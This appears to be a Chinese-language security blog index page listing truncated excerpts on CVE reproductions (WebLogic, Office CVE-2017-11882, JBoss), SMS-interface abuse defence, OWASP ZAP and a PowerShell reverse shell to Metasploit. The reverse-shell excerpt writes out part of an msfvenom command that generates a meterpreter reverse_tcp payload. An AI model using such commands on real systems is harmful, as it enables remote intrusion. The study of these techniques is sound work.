漏洞说明 近期不少安全厂商发现Weblogic主机被攻击者植入恶意程序,经分析,攻击者利用Weblogic WLS 组件漏洞(CVE-2017-10271),构造payload下载并执行虚拟币挖矿程序,对Weblogic…
突破封闭Web系统的技巧之正面冲锋
作者:LandGrey 转载公众号:信安之路 在互联网安全服务公司乙方工作的人或者进行 SRC 众测等相关渗透测试时,经常碰到客户只给一个 "xxx信息管理系统"、"xxx平台"之类的一个……
短信接口被恶意攻击解决方案
0x01短信接口被恶意攻击 接口来源 1.WEB注册接口 2.APP注册接口 发送大量验证码 IP数量不断变化,大量手机号码(不在意短信是否空号) 目前解决方案 增加了安全验证码 输入……
OWASP ZAP 2.7.0 版本全球发布
0x01OWASP ZAP OWASP Zed Attack Proxy (ZAP)工具是世界上最受欢迎的免费安全工具之一。ZAP可以帮助安全测试人员在开发和测试应用程序过程中,自动发现 Web应用程序中的安全漏洞……
利用powershell反弹shell到metasploit
一、使用msfvenom生成PS1文件: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.135.100 LPORT=1234 -f psh-r…
CVE-2017-11882 漏洞复现
漏洞说明 2017年11月14日,微软发布了11月的安全补丁更新,其中值得注意的是CVE-2017-11882.这个漏洞是Office的内存损坏漏洞,攻击者可以利用这个漏洞以当前登录的用户的身份执行……
CVE-2017-12149 JBOOS反序列化漏洞复现
漏洞描述 2017年9月14日,国家信息安全漏洞共享平台(CNVD)收录了JBOSS Application Server反序列化命令执行漏洞(CNVD-2017-33724,对应CVE-2017-12149),远程攻击…